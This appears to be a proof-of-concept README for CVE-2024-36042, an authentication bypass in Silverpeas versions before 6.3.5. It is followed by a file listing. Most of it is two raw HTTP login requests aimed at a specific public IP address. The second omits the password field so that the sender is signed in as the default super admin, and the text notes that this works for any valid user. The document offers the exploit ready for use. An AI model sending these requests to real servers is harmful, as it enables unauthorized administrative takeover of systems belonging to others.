CVE-2024-36042 Silverpeas authentication bypass vulnerability #Silverpeas #vulnerability #authentication # CVE-2024-36042
CVE-2024-36042 Silverpeas authentication bypass vulnerability #Silverpeas #vulnerability #authentication
## Firstly we must identify is that vulnerable version.
All versions prior to 6.3.5 are vulnerable (i.e., version 6.3.4 and earlier). if the sender omits the password form field, the application will sign you in as the user specified without any challenge.
## The standard login request will look like this in Burp Suite:
```
POST /silverpeas/AuthenticationServlet HTTP/2
Host: 212.129.58.88
Content-Length: 28
Origin: https://212.129.58.88
Content-Type: application/x-www-form-urlencoded
Login=SilverAdmin&Password=SilverAdmin&DomainId=0
```
This will fail login (unless they have forgotten to change the default password) and you will be redirected back to the login page with an error code.
## But if you remove the password field like this:
```
POST /silverpeas/AuthenticationServlet HTTP/2
Host: 212.129.58.88
Content-Length: 28
Origin: https://212.129.58.88
Content-Type: application/x-www-form-urlencoded
Login=SilverAdmin&DomainId=0
```
Then the login attempt will (usually) succeed and redirect you to the main page, now logged in as a super admin.
The bug works with any valid user, but SilverAdmin is the default super admin.
Engoy !
[4.0K] /data/pocs/0d7cd40be279f5756ddc7ead2e1e871a8814afd4
├── [ 82K] evidance.png
├── [1.3K] README.md
└── [ 82K] Screenshot 2025-08-20 003647.png
0 directories, 3 files